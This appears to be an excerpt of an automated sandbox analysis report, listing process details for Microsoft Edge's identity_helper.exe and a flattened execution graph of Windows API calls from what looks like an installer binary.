                                                                                                                                                                                                        File size:1'113'992 bytes
                                                                                                                                                                                                        MD5 hash:688D7C201AD85A9C6EDAFDC457E53219
                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Target ID:27
                                                                                                                                                                                                        Start time:02:11:13
                                                                                                                                                                                                        Start date:11/11/2024
                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.31\identity_helper.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.31\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2044,2106387817418742249,13274120828406319396,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6276 /prefetch:8
                                                                                                                                                                                                        Imagebase:0x7ff7b5d70000
                                                                                                                                                                                                        File size:1'113'992 bytes
                                                                                                                                                                                                        MD5 hash:688D7C201AD85A9C6EDAFDC457E53219
                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        Disassembly

                                                                                                                                                                                                        Reset < >

                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                          Execution Coverage:22.5%
                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                          Signature Coverage:23%
                                                                                                                                                                                                          Total number of Nodes:1226
                                                                                                                                                                                                          Total number of Limit Nodes:34
                                                                                                                                                                                                          execution_graph 2666 403a41 2667 403b94 2666->2667 2668 403a59 2666->2668 2670 403be5 2667->2670 2671 403ba5 GetDlgItem GetDlgItem 2667->2671 2668->2667 2669 403a65 2668->2669 2672 403a70 SetWindowPos 2669->2672 2673 403a83 2669->2673 2675 403c3f 2670->2675 2683 401389 2 API calls 2670->2683 2674 403f14 19 API calls 2671->2674 2672->2673 2677 403aa0 2673->2677 2678 403a88 ShowWindow 2673->2678 2679 403bcf SetClassLongA 2674->2679 2684 403b8f 2675->2684 2736 403f60 2675->2736 2680 403ac2 2677->2680 2681 403aa8 DestroyWindow 2677->2681 2678->2677 2682 40140b 2 API calls 2679->2682 2686 403ac7 SetWindowLongA 2680->2686 2687 403ad8 2680->2687 2685 403e9d 2681->2685 2682->2670 2688 403c17 2683->2688 2685->2684 2695 403ece ShowWindow 2685->2695 2686->2684 2691 403b81 2687->2691 2692 403ae4 GetDlgItem 2687->2692 2688->2675 2693 403c1b SendMessageA 2688->2693 2689 40140b 2 API calls 2707 403c51 2689->2707 2690 403e9f DestroyWindow EndDialog 2690->2685 2773 403f7b 2691->2773 2696 403b14 2692->2696 2697 403af7 SendMessageA IsWindowEnabled 2692->2697 2693->2684 2695->2684 2699 403b21 2696->2699 2700 403b68 SendMessageA 2696->2700 2701 403b34 2696->2701 2710 403b19 2696->2710 2697->2684 2697->2696 2699->2700 2699->2710 2700->2691 2704 403b51 2701->2704 2705 403b3c 2701->2705 2703 403f14 19 API calls 2703->2707 2709 40140b 2 API calls 2704->2709 2767 40140b 2705->2767 2706 403b4f 2706->2691 2707->2684 2707->2689 2707->2690 2707->2703 2727 403ddf DestroyWindow 2707->2727 2739 405d51 2707->2739 2757 403f14 2707->2757 2711 403b58 2709->2711 2770 403eed 2710->2770 2711->2691 2711->2710 2713 403ccc GetDlgItem 2714 403ce1 2713->2714 2715 403ce9 ShowWindow KiUserCallbackDispatcher 2713->2715 2714->2715 2760 403f36 KiUserCallbackDispatcher 2715->2760 2717 403d13 EnableWindow 2720 403d27 2717->2720 2718 403d2c GetSystemMenu EnableMenuItem SendMessageA 2719 403d5c SendMessageA 2718->2719 2718->2720 2719->2720 2720->2718 2761 403f49 SendMessageA 2720->2761 2762 405d2f lstrcpynA 2720->2762 2723 403d8a lstrlenA 2724 405d51 18 API calls 2723->2724 2725 403d9b SetWindowTextA 2724->2725 2763 401389 2725->2763 2727->2685 2728 403df9 CreateDialogParamA 2727->2728 2728->2685 2729 403e2c 2728->2729 2730 403f14 19 API calls 2729->2730 2731 403e37 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 2730->2731 2732 401389 2 API calls 2731->2732 2733 403e7d 2732->2733 2733->2684 2734 403e85 ShowWindow 2733->2734 2735 403f60 SendMessageA 2734->2735 2735->2685 2737 403f78 2736->2737 2738 403f69 SendMessageA 2736->2738 2737->2707 2738->2737 2744 405d5e 2739->2744 2740 405f81 2741 405f96 2740->2741 2803 405d2f lstrcpynA 2740->2803 2741->2707 2743 405dff GetVersion 2743->2744 2744->2740 2744->2743 2745 405f58 lstrlenA 2744->2745 2748 405d51 10 API calls 2744->2748 2750 405e77 GetSystemDirectoryA 2744->2750 2751 405e8a GetWindowsDirectoryA 2744->2751 2753 405ebe SHGetSpecialFolderLocation 2744->2753 2754 405d51 10 API calls 2744->2754 2755 405f01 lstrcatA 2744->2755 2787 405c16 RegOpenKeyExA 2744->2787 2792 405f9a 2744->2792 2801 405c8d wsprintfA 2744->2801 2802 405d2f lstrcpynA 2744->2802 2745->2744 2748->2745 2750->2744 2751->2744 2753->2744 2756 405ed6 SHGetPathFromIDListA CoTaskMemFree 2753->2756 2754->2744 2755->2744 2756->2744 2758 405d51 18 API calls 2757->2758 2759 403f1f SetDlgItemTextA 2758->2759 2759->2713 2760->2717 2761->2720 2762->2723 2764 401390 2763->2764 2765 4013fe 2764->2765 2766 4013cb MulDiv SendMessageA 2764->2766 2765->2707 2766->2764 2768 401389 2 API calls 2767->2768 2769 401420 2768->2769 2769->2710 2771 403ef4 2770->2771 2772 403efa SendMessageA 2770->2772 2771->2772 2772->2706 2774 403f93 GetWindowLongA 2773->2774 2784 40401c 2773->2784 2775 403fa4 2774->2775 2774->2784 2776 403fb3 GetSysColor 2775->2776 2777 403fb6 2775->2777 2776->2777 2778 403fc6 SetBkMode 2777->2778 2779 403fbc SetTextColor 2777->2779 2780 403fe4 2778->2780 2781 403fde GetSysColor 2778->2781 2779->2778 2782 403feb SetBkColor 2780->2782 2783 403ff5 2780->2783 2781->2780 2782->2783 2783->2784 2785 404008 DeleteObject 2783->2785 2786 40400f CreateBrushIndirect 2783->2786 2784->2684 2785->2786 2786->2784 2788 405c87 2787->2788 2789 405c49 RegQueryValueExA 2787->2789 2788->2744 2790 405c6a RegCloseKey 2789->2790 2790->2788 2799 405fa6 2792->2799 2793 40600e 2794 406012 CharPrevA 2793->2794 2796 40602d 2793->2796 2794->2793 2795 406003 CharNextA 2795->2793 2795->2799 2796->2744 2798 405ff1 CharNextA 2798->2799 2799->2793 2799->2795 2799->2798 2800 405ffe CharNextA 2799->2800 2804 4057cc 2799->2804 2800->2795 2801->2744 2802->2744 2803->2741 2805 4057d2 2804->2805 2806 4057e5 2805->2806 2807 4057d8 CharNextA 2805->2807 2806->2799 2807->2805 3452 401cc2 3453 402a1d 18 API calls 3452->3453 3454 401cd2 SetWindowLongA 3453->3454 3455 4028cf 3454->3455 3456 401a43 3457 402a1d 18 API calls 3456->3457 3458 401a49 3457->3458 3459 402a1d 18 API calls 3458->3459 3460 4019f3 3459->3460 2842 401e44 2843 402a3a 18 API calls 2842->2843 2844 401e4a 2843->2844 2858 404f48 2844->2858 2848 401eb0 CloseHandle 2852 4026a6 2848->2852 2849 401e79 WaitForSingleObject 2850 401e5a 2849->2850 2851 401e87 GetExitCodeProcess 2849->2851 2850->2848 2850->2849 2850->2852 2872 406104 2850->2872 2854 401ea4 2851->2854 2855 401e99 2851->2855 2854->2848 2857 401ea2 2854->2857 2876 405c8d wsprintfA 2855->2876 2857->2848 2859 401e54 2858->2859 2860 404f63 2858->2860 2869 4054c0 CreateProcessA 2859->2869 2861 404f80 lstrlenA 2860->2861 2862 405d51 18 API calls 2860->2862 2863 404fa9 2861->2863 2864 404f8e lstrlenA 2861->2864 2862->2861 2866 404fbc 2863->2866 2867 404faf SetWindowTextA 2863->2867 2864->2859 2865 404fa0 lstrcatA 2864->2865 2865->2863 2866->2859 2868 404fc2 SendMessageA SendMessageA SendMessageA 2866->2868 2867->2866 2868->2859 2870 4054f3 CloseHandle 2869->2870 2871 4054ff 2869->2871 2870->2871 2871->2850 2873 406121 PeekMessageA 2872->2873 2874 406131 2873->2874 2875 406117 DispatchMessageA 2873->2875 2874->2849 2875->2873 2876->2857 3461 402644 3462 40264a 3461->3462 3463 402652 FindClose 3462->3463 3464 4028cf 3462->3464 3463->3464 3465 4048c5 GetDlgItem GetDlgItem 3466 404917 7 API calls 3465->3466 3478 404b2f 3465->3478 3467 4049ba DeleteObject 3466->3467 3468 4049ad SendMessageA 3466->3468 3469 4049c3 3467->3469 3468->3467 3471 4049fa 3469->3471 3472 405d51 18 API calls 3469->3472 3470 404c13 3474 404cbf 3470->3474 3480 404b22 3470->3480 3485 404c6c SendMessageA 3470->3485 3473 403f14 19 API calls 3471->3473 3475 4049dc SendMessageA SendMessageA 3472->3475 3479 404a0e 3473->3479 3476 404cd1 3474->3476 3477 404cc9 SendMessageA 3474->3477 3475->3469 3487 404ce3 ImageList_Destroy 3476->3487 3488 404cea 3476->3488 3496 404cfa 3476->3496 3477->3476 3478->3470 3499 404ba0 3478->3499 3518 404813 SendMessageA 3478->3518 3484 403f14 19 API calls 3479->3484 3481 403f7b 8 API calls 3480->3481 3486 404eb5 3481->3486 3482 404c05 SendMessageA 3482->3470 3500 404a1c 3484->3500 3485->3480 3490 404c81 SendMessageA 3485->3490 3487->3488 3491 404cf3 GlobalFree 3488->3491 3488->3496 3489 404e69 3489->3480 3494 404e7b ShowWindow GetDlgItem ShowWindow 3489->3494 3493 404c94 3490->3493 3491->3496 3492 404af0 GetWindowLongA SetWindowLongA 3495 404b09 3492->3495 3501 404ca5 SendMessageA 3493->3501 3494->3480 3497 404b27 3495->3497 3498 404b0f ShowWindow 3495->3498 3496->3489 3509 404d35 3496->3509 3523 404893 3496->3523 3517 403f49 SendMessageA 3497->3517 3516 403f49 SendMessageA 3498->3516 3499->3470 3499->3482 3500->3492 3502 404aea 3500->3502 3505 404a6b SendMessageA 3500->3505 3506 404aa7 SendMessageA 3500->3506 3507 404ab8 SendMessageA 3500->3507 3501->3474 3502->3492 3502->3495 3505->3500 3506->3500 3507->3500 3510 404d79 3509->3510 3512 404d63 SendMessageA 3509->3512 3511 404e3f InvalidateRect 3510->3511 3515 404ded SendMessageA SendMessageA 3510->3515 3511->3489 3513 404e55 3511->3513 3512->3510 3532 4047ce 3513->3532 3515->3510 3516->3480 3517->3478 3519 404872 SendMessageA 3518->3519 3520 404836 GetMessagePos ScreenToClient SendMessageA 3518->3520 3521 40486a 3519->3521 3520->3521 3522 40486f 3520->3522 3521->3499 3522->3519 3535 405d2f lstrcpynA 3523->3535 3525 4048a6 3536 405c8d wsprintfA 3525->3536 3527 4048b0 3528 40140b 2 API calls 3527->3528 3529 4048b9 3528->3529 3537 405d2f lstrcpynA 3529->3537 3531 4048c0 3531->3509 3538 404709 3532->3538 3534 4047e3 3534->3489 3535->3525 3536->3527 3537->3531 3539 40471f 3538->3539 3540 405d51 18 API calls 3539->3540 3541 404783 3540->3541 3542 405d51 18 API calls 3541->3542 3543 40478e 3542->3543 3544 405d51 18 API calls 3543->3544 3545 4047a4 lstrlenA wsprintfA SetDlgItemTextA 3544->3545 3545->3534 3546 4026c6 3547 402a3a 18 API calls 3546->3547 3548 4026d4 3547->3548 3549 4026ea 3548->3549 3550 402a3a 18 API calls 3548->3550 3551 40597d 2 API calls 3549->3551 3550->3549 3552 4026f0 3551->3552 3574 4059a2 GetFileAttributesA CreateFileA 3552->3574 3554 4026fd 3555 4027a0 3554->3555 3556 402709 GlobalAlloc 3554->3556 3559 4027a8 DeleteFileA 3555->3559 3560 4027bb 3555->3560 3557 402722 3556->3557 3558 402797 CloseHandle 3556->3558 3575 4030c7 SetFilePointer 3557->3575 3558->3555 3559->3560 3562 402728 3563 4030b1 ReadFile 3562->3563 3564 402731 GlobalAlloc 3563->3564 3565 402741 3564->3565 3566 402775 3564->3566 3568 402e9f 32 API calls 3565->3568 3567 405a49 WriteFile 3566->3567 3569 402781 GlobalFree 3567->3569 3573 40274e 3568->3573 3570 402e9f 32 API calls 3569->3570 3571 402794 3570->3571 3571->3558 3572 40276c GlobalFree 3572->3566 3573->3572 3574->3554 3575->3562 3576 402847 3577 402a1d 18 API calls 3576->3577 3578 40284d 3577->3578 3579 40287e 3578->3579 3580 4026a6 3578->3580 3581 40285b 3578->3581 3579->3580 3582 405d51 18 API calls 3579->3582 3581->3580 3584 405c8d wsprintfA 3581->3584 3582->3580 3584->3580 3585 4022c7 3586 402a3a 18 API calls 3585->3586 3587 4022d8 3586->3587 3588 402a3a 18 API calls 3587->3588 3589 4022e1 3588->3589 3590 402a3a 18 API calls 3589->3590 3591 4022eb GetPrivateProfileStringA 3590->3591 3377 401751 3378 402a3a 18 API calls 3377->3378 3379 401758 3378->3379 3380 401776 3379->3380 3381 40177e 3379->3381 3416 405d2f lstrcpynA 3380->3416 3417 405d2f lstrcpynA 3381->3417 3384 40177c 3388 405f9a 5 API calls 3384->3388 3385 401789 3386 4057a1 3 API calls 3385->3386 3387 40178f lstrcatA 3386->3387 3387->3384 3401 40179b 3388->3401 3389 406033 2 API calls 3389->3401 3390 40597d 2 API calls 3390->3401 3392 4017b2 CompareFileTime 3392->3401 3393 401876 3394 404f48 25 API calls 3393->3394 3396 401880 3394->3396 3395 404f48 25 API calls 3397 401862 3395->3397 3398 402e9f 32 API calls 3396->3398 3400 401893 3398->3400 3399 405d2f lstrcpynA 3399->3401 3402 4018a7 SetFileTime 3400->3402 3404 4018b9 CloseHandle 3400->3404 3401->3389 3401->3390 3401->3392 3401->3393 3401->3399 3403 405d51 18 API calls 3401->3403 3412 405525 MessageBoxIndirectA 3401->3412 3414 40184d 3401->3414 3415 4059a2 GetFileAttributesA CreateFileA 3401->3415 3402->3404 3403->3401 3404->3397 3405 4018ca 3404->3405 3406 4018e2 3405->3406 3407 4018cf 3405->3407 3408 405d51 18 API calls 3406->3408 3409 405d51 18 API calls 3407->3409 3411 4018ea 3408->3411 3410 4018d7 lstrcatA 3409->3410 3410->3411 3413 405525 MessageBoxIndirectA 3411->3413 3412->3401 3413->3397 3414->3395 3414->3397 3415->3401 3416->3384 3417->3385 3595 401651 3596 402a3a 18 API calls 3595->3596 3597 401657 3596->3597 3598 406033 2 API calls 3597->3598 3599 40165d 3598->3599 3600 401951 3601 402a1d 18 API calls 3600->3601 3602 401958 3601->3602 3603 402a1d 18 API calls 3602->3603 3604 401962 3603->3604 3605 402a3a 18 API calls 3604->3605 3606 40196b 3605->3606 3607 40197e lstrlenA 3606->3607 3612 4019b9 3606->3612 3608 401988 3607->3608 3608->3612 3613 405d2f lstrcpynA 3608->3613 3610 4019a2 3611 4019af lstrlenA 3610->3611 3610->3612 3611->3612 3613->3610 3614 404352 3615 40437e 3614->3615 3616 40438f 3614->3616 3675 405509 GetDlgItemTextA 3615->3675 3618 40439b GetDlgItem 3616->3618 3651 4043fa 3616->3651 3620 4043af 3618->3620 3619 404389 3621 405f9a 5 API calls 3619->3621 3623 4043c3 SetWindowTextA 3620->3623 3629 40583a 4 API calls 3620->3629 3621->3616 3627 403f14 19 API calls 3623->3627 3624 404688 3628 403f7b 8 API calls 3624->3628 3625 405d51 18 API calls 3630 40446e SHBrowseForFolderA 3625->3630 3626 40450e 3631 40588f 18 API calls 3626->3631 3632 4043df 3627->3632 3633 40469c 3628->3633 3634 4043b9 3629->3634 3635 404486 CoTaskMemFree 3630->3635 3636 4044de 3630->3636 3637 404514 3631->3637 3638 403f14 19 API calls 3632->3638 3634->3623 3641 4057a1 3 API calls 3634->3641 3639 4057a1 3 API calls 3635->3639 3636->3624 3677 405509 GetDlgItemTextA 3636->3677 3678 405d2f lstrcpynA 3637->3678 3640 4043ed 3638->3640 3642 404493 3639->3642 3676 403f49 SendMessageA 3640->3676 3641->3623 3645 4044ca SetDlgItemTextA 3642->3645 3650 405d51 18 API calls 3642->3650 3645->3636 3646 4043f3 3648 4060c8 5 API calls 3646->3648 3647 40452b 3649 4060c8 5 API calls 3647->3649 3648->3651 3658 404532 3649->3658 3652 4044b2 lstrcmpiA 3650->3652 3651->3624 3651->3625 3651->3636 3652->3645 3655 4044c3 lstrcatA 3652->3655 3653 40456e 3679 405d2f lstrcpynA 3653->3679 3655->3645 3656 404575 3657 40583a 4 API calls 3656->3657 3659 40457b GetDiskFreeSpaceA 3657->3659 3658->3653 3661 4057e8 2 API calls 3658->3661 3663 4045c6 3658->3663 3662 40459f MulDiv 3659->3662 3659->3663 3661->3658 3662->3663 3664 404637 3663->3664 3665 4047ce 21 API calls 3663->3665 3666 40465a 3664->3666 3668 40140b 2 API calls 3664->3668 3667 404624 3665->3667 3680 403f36 KiUserCallbackDispatcher 3666->3680 3670 404639 SetDlgItemTextA 3667->3670 3671 404629 3667->3671 3668->3666 3670->3664 3673 404709 21 API calls 3671->3673 3672 404676 3672->3624 3681 4042e7 3672->3681 3673->3664 3675->3619 3676->3646 3677->3626 3678->3647 3679->3656 3680->3672 3682 4042f5 3681->3682 3683 4042fa SendMessageA 3681->3683 3682->3683 3683->3624 3684 4019d2 3685 402a3a 18 API calls 3684->3685 3686 4019d9 3685->3686 3687 402a3a 18 API calls 3686->3687 3688 4019e2 3687->3688 3689 4019e9 lstrcmpiA 3688->3689 3690 4019fb lstrcmpA 3688->3690 3691 4019ef 3689->3691 3690->3691 3692 4021d2 3693 402a3a 18 API calls 3692->3693 3694 4021d8 3693->3694 3695 402a3a 18 API calls 3694->3695 3696 4021e1 3695->3696 3697 402a3a 18 API calls 3696->3697 3698 4021ea 3697->3698 3699 406033 2 API calls 3698->3699 3700 4021f3 3699->3700 3701 402204 lstrlenA lstrlenA 3700->3701 3702 4021f7 3700->3702 3704 404f48 25 API calls 3701->3704 3703 404f48 25 API calls 3702->3703 3706 4021ff 3702->3706 3703->3706 3705 402240 SHFileOperationA 3704->3705 3705->3702 3705->3706 3443 4014d6 3444 402a1d 18 API calls 3443->3444 3445 4014dc Sleep 3444->3445 3447 4028cf 3445->3447 3707 40155b 3708 401577 ShowWindow 3707->3708 3709 40157e 3707->3709 3708->3709 3710 40158c ShowWindow 3709->3710 3711 4028cf 3709->3711 3710->3711 3712 40255c 3713 402a1d 18 API calls 3712->3713 3715 402566 3713->3715 3714 4025d0 3715->3714 3716 405a1a ReadFile 3715->3716 3717 4025d2 3715->3717 3720 4025e2 3715->3720 3716->3715 3721 405c8d wsprintfA 3717->3721 3719 4025f8 SetFilePointer 3719->3714 3720->3714 3720->3719 3721->3714 3722 40405d 3723 404073 3722->3723 3730 40417f 3722->3730 3727 403f14 19 API calls 3723->3727 3724 4041ee 3725 4042c2 3724->3725 3726 4041f8 GetDlgItem 3724->3726 3732 403f7b 8 API calls 3725->3732 3728 404280 3726->3728 3729 40420e 3726->3729 3731 4040c9 3727->3731 3728->3725 3737 404292 3728->3737 3729->3728 3736 404234 6 API calls 3729->3736 3730->3724 3730->3725 3734 4041c3 GetDlgItem SendMessageA 3730->3734 3733 403f14 19 API calls 3731->3733 3744 4042bd 3732->3744 3735 4040d6 CheckDlgButton 3733->3735 3753 403f36 KiUserCallbackDispatcher 3734->3753 3751 403f36 KiUserCallbackDispatcher 3735->3751 3736->3728 3740 404298 SendMessageA 3737->3740 3741 4042a9 3737->3741 3740->3741 3741->3744 3745 4042af SendMessageA 3741->3745 3742 4041e9 3746 4042e7 SendMessageA 3742->3746 3743 4040f4 GetDlgItem 3752 403f49 SendMessageA 3743->3752 3745->3744 3746->3724 3748 40410a SendMessageA 3749 404131 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 3748->3749 3750 404128 GetSysColor 3748->3750 3749->3744 3750->3749 3751->3743 3752->3748 3753->3742 3754 40205e 3755 402a3a 18 API calls 3754->3755 3756 402065 3755->3756 3757 402a3a 18 API calls 3756->3757 3758 40206f 3757->3758 3759 402a3a 18 API calls 3758->3759 3760 402079 3759->3760 3761 402a3a 18 API calls 3760->3761 3762 402083 3761->3762 3763 402a3a 18 API calls 3762->3763 3764 40208d 3763->3764 3765 4020cc CoCreateInstance 3764->3765 3766 402a3a 18 API calls 3764->3766 3769 4020eb 3765->3769 3771 402193 3765->3771 3766->3765 3767 401423 25 API calls 3768 4021c9 3767->3768 3770 402173 MultiByteToWideChar 3769->3770 3769->3771 3770->3771 3771->3767 3771->3768 3772 40265e 3773 402664 3772->3773 3774 402668 FindNextFileA 3773->3774 3775 40267a 3773->3775 3774->3775 3776 4026b9 3774->3776 3778 405d2f lstrcpynA 3776->3778 3778->3775 3779 401cde GetDlgItem GetClientRect 3780 402a3a 18 API calls 3779->3780 3781 401d0e LoadImageA SendMessageA 3780->3781 3782 401d2c DeleteObject 3781->3782 3783 4028cf 3781->3783 3782->3783 3784 401662 3785 402a3a 18 API calls 3784->3785 3786 401669 3785->3786 3787 402a3a 18 API calls 3786->3787 3788 401672 3787->3788 3789 402a3a 18 API calls 3788->3789 3790 40167b MoveFileA 3789->3790 3791 401687 3790->3791 3792 40168e 3790->3792 3793 401423 25 API calls 3791->3793 3794 406033 2 API calls 3792->3794 3796 4021c9 3792->3796 3793->3796 3795 40169d 3794->3795 3795->3796 3797 405bea 38 API calls 3795->3797 3797->3791 3798 402364 3799 40236a 3798->3799 3800 402a3a 18 API calls 3799->3800 3801 40237c 3800->3801 3802 402a3a 18 API calls 3801->3802 3803 402386 RegCreateKeyExA 3802->3803 3804 4023b0 3803->3804 3805 4028cf 3803->3805 3806 4023c8 3804->3806 3807 402a3a 18 API calls 3804->3807 3808 4023d4 3806->3808 3811 402a1d 18 API calls 3806->3811 3810 4023c1 lstrlenA 3807->3810 3809 4023ef RegSetValueExA 3808->3809 3812 402e9f 32 API calls 3808->3812 3813 402405 RegCloseKey 3809->3813 3810->3806 3811->3808 3812->3809 3813->3805 3815 401dea 3816 402a3a 18 API calls 3815->3816 3817 401df0 3816->3817 3818 402a3a 18 API calls 3817->3818 3819 401df9 3818->3819 3820 402a3a 18 API calls 3819->3820 3821 401e02 3820->3821 3822 402a3a 18 API calls 3821->3822 3823 401e0b 3822->3823 3824 401423 25 API calls 3823->3824 3825 401e12 ShellExecuteA 3824->3825 3826 401e3f 3825->3826 3827 40366d 3828 403678 3827->3828 3829 40367c 3828->3829 3830 40367f GlobalAlloc 3828->3830 3830->3829 3831 401eee 3832 402a3a 18 API calls 3831->3832 3833 401ef5 3832->3833 3834 4060c8 5 API calls 3833->3834 3835 401f04 3834->3835 3836 401f1c GlobalAlloc 3835->3836 3837 401f84 3835->3837 3836->3837 3838 401f30 3836->3838 3839 4060c8 5 API calls 3838->3839 3840 401f37 3839->3840 3841 4060c8 5 API calls 3840->3841 3842 401f41 3841->3842 3842->3837 3846 405c8d wsprintfA 3842->3846 3844 401f78 3847 405c8d wsprintfA 3844->3847 3846->3844 3847->3837 3848 4014f0 SetForegroundWindow 3849 4028cf 3848->3849 3855 4018f5 3856 40192c 3855->3856 3857 402a3a 18 API calls 3856->3857 3858 401931 3857->3858 3859 4055d1 69 API calls 3858->3859 3860 40193a 3859->3860 3861 4024f7 3862 402a3a 18 API calls 3861->3862 3863 4024fe 3862->3863 3866 4059a2 GetFileAttributesA CreateFileA 3863->3866 3865 40250a 3866->3865 3867 4018f8 3868 402a3a 18 API calls 3867->3868 3869 4018ff 3868->3869 3870 405525 MessageBoxIndirectA 3869->3870 3871 401908 3870->3871 3872 4014fe 3873 401506 3872->3873 3875 401519 3872->3875 3874 402a1d 18 API calls 3873->3874 3874->3875 3876 402b7f 3877 402ba7 3876->3877 3878 402b8e SetTimer 3876->3878 3879 402bfc 3877->3879 3880 402bc1 MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 3877->3880 3878->3877 3880->3879 3881 401000 3882 401037 BeginPaint GetClientRect 3881->3882 3883 40100c DefWindowProcA 3881->3883 3885 4010f3 3882->3885 3888 401179 3883->3888 3886 401073 CreateBrushIndirect FillRect DeleteObject 3885->3886 3887 4010fc 3885->3887 3886->3885 3889 401102 CreateFontIndirectA 3887->3889 3890 401167 EndPaint 3887->3890 3889->3890 3891 401112 6 API calls 3889->3891 3890->3888 3891->3890 2808 402482 2819 402b44 2808->2819 2810 40248c 2823 402a1d 2810->2823 2812 402495 2813 40249f 2812->2813 2816 4026a6 2812->2816 2814 4024b8 RegEnumValueA 2813->2814 2815 4024ac RegEnumKeyA 2813->2815 2814->2816 2817 4024d1 RegCloseKey 2814->2817 2815->2817 2817->2816 2826 402a3a 2819->2826 2821 402b5d 2822 402b6b RegOpenKeyExA 2821->2822 2822->2810 2824 405d51 18 API calls 2823->2824 2825 402a31 2824->2825 2825->2812 2827 402a46 2826->2827 2828 405d51 18 API calls 2827->2828 2829 402a67 2828->2829 2830 402a73 2829->2830 2831 405f9a 5 API calls 2829->2831 2830->2821 2831->2830 3892 401b02 3893 402a3a 18 API calls 3892->3893 3894 401b09 3893->3894 3895 402a1d 18 API calls 3894->3895 3896 401b12 wsprintfA 3895->3896 3897 4028cf 3896->3897 2832 402283 2833 40228b 2832->2833 2835 402291 2832->2835 2834 402a3a 18 API calls 2833->2834 2834->2835 2836 402a3a 18 API calls 2835->2836 2837 4022a1 2835->2837 2836->2837 2838 402a3a 18 API calls 2837->2838 2840 4022af 2837->2840 2838->2840 2839 402a3a 18 API calls 2841 4022b8 WritePrivateProfileStringA 2839->2841 2840->2839 3898 401a03 3899 402a3a 18 API calls 3898->3899 3900 401a0c ExpandEnvironmentStringsA 3899->3900 3901 401a20 3900->3901 3903 401a33 3900->3903 3902 401a25 lstrcmpA 3901->3902 3901->3903 3902->3903 2877 405086 2878 405231 2877->2878 2879 4050a8 GetDlgItem GetDlgItem GetDlgItem 2877->2879 2881 405261 2878->2881 2882 405239 GetDlgItem CreateThread CloseHandle 2878->2882 2922 403f49 SendMessageA 2879->2922 2883 4052b0 2881->2883 2884 405277 ShowWindow ShowWindow 2881->2884 2885 40528f 2881->2885 2882->2881 2925 40501a OleInitialize 2882->2925 2891 403f7b 8 API calls 2883->2891 2924 403f49 SendMessageA 2884->2924 2886 4052ea 2885->2886 2889 4052c3 ShowWindow 2885->2889 2890 40529f 2885->2890 2886->2883 2893 4052f7 SendMessageA 2886->2893 2887 405118 2892 40511f GetClientRect GetSystemMetrics SendMessageA SendMessageA 2887->2892 2896 4052e3 2889->2896 2897 4052d5 2889->2897 2894 403eed SendMessageA 2890->2894 2895 4052bc 2891->2895 2898 405171 SendMessageA SendMessageA 2892->2898 2899 40518d 2892->2899 2893->2895 2900 405310 CreatePopupMenu 2893->2900 2894->2883 2904 403eed SendMessageA 2896->2904 2903 404f48 25 API calls 2897->2903 2898->2899 2901 4051a0 2899->2901 2902 405192 SendMessageA 2899->2902 2905 405d51 18 API calls 2900->2905 2906 403f14 19 API calls 2901->2906 2902->2901 2903->2896 2904->2886 2907 405320 AppendMenuA 2905->2907 2908 4051b0 2906->2908 2909 405351 TrackPopupMenu 2907->2909 2910 40533e GetWindowRect 2907->2910 2911 4051b9 ShowWindow 2908->2911 2912 4051ed GetDlgItem SendMessageA 2908->2912 2909->2895 2913 40536d 2909->2913 2910->2909 2914 4051dc 2911->2914 2915 4051cf ShowWindow 2911->2915 2912->2895 2916 405214 SendMessageA SendMessageA 2912->2916 2917 40538c SendMessageA 2913->2917 2923 403f49 SendMessageA 2914->2923 2915->2914 2916->2895 2917->2917 2918 4053a9 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 2917->2918 2920 4053cb SendMessageA 2918->2920 2920->2920 2921 4053ed GlobalUnlock SetClipboardData CloseClipboard 2920->2921 2921->2895 2922->2887 2923->2912 2924->2885 2926 403f60 SendMessageA 2925->2926 2927 40503d 2926->2927 2930 401389 2 API calls 2927->2930 2931 405064 2927->2931 2928 403f60 SendMessageA 2929 405076 CoUninitialize 2928->2929 2930->2927 2931->2928 3904 402308 3905 402338 3904->3905 3906 40230d 3904->3906 3908 402a3a 18 API calls 3905->3908 3907 402b44 19 API calls 3906->3907 3909 402314 3907->3909 3910 40233f 3908->3910 3911 402a3a 18 API calls 3909->3911 3914 402355 3909->3914 3915 402a7a RegOpenKeyExA 3910->3915 3912 402325 RegDeleteValueA RegCloseKey 3911->3912 3912->3914 3919 402aa5 3915->3919 3923 402af1 3915->3923 3916 402acb RegEnumKeyA 3917 402add RegCloseKey 3916->3917 3916->3919 3920 4060c8 5 API calls 3917->3920 3918 402b02 RegCloseKey 3918->3923 3919->3916 3919->3917 3919->3918 3921 402a7a 5 API calls 3919->3921 3922 402aed 3920->3922 3921->3919 3922->3923 3924 402b1d RegDeleteKeyA 3922->3924 3923->3914 3924->3923 3925 402688 3926 402a3a 18 API calls 3925->3926 3927 40268f FindFirstFileA 3926->3927 3928 4026b2 3927->3928 3932 4026a2 3927->3932 3929 4026b9 3928->3929 3933 405c8d wsprintfA 3928->3933 3934 405d2f lstrcpynA 3929->3934 3933->3929 3934->3932 3935 401c8a 3936 402a1d 18 API calls 3935->3936 3937 401c90 IsWindow 3936->3937 3938 4019f3 3937->3938 3939 40430b 3940 404341 3939->3940 3941 40431b 3939->3941 3943 403f7b 8 API calls 3940->3943 3942 403f14 19 API calls 3941->3942 3944 404328 SetDlgItemTextA 3942->3944 3945 40434d 3943->3945 3944->3940 3064 40310f SetErrorMode GetVersion 3065 403146 3064->3065 3066 40314c 3064->3066 3067 4060c8 5 API calls 3065->3067 3152 40605a GetSystemDirectoryA 3066->3152 3067->3066 3069 403162 lstrlenA 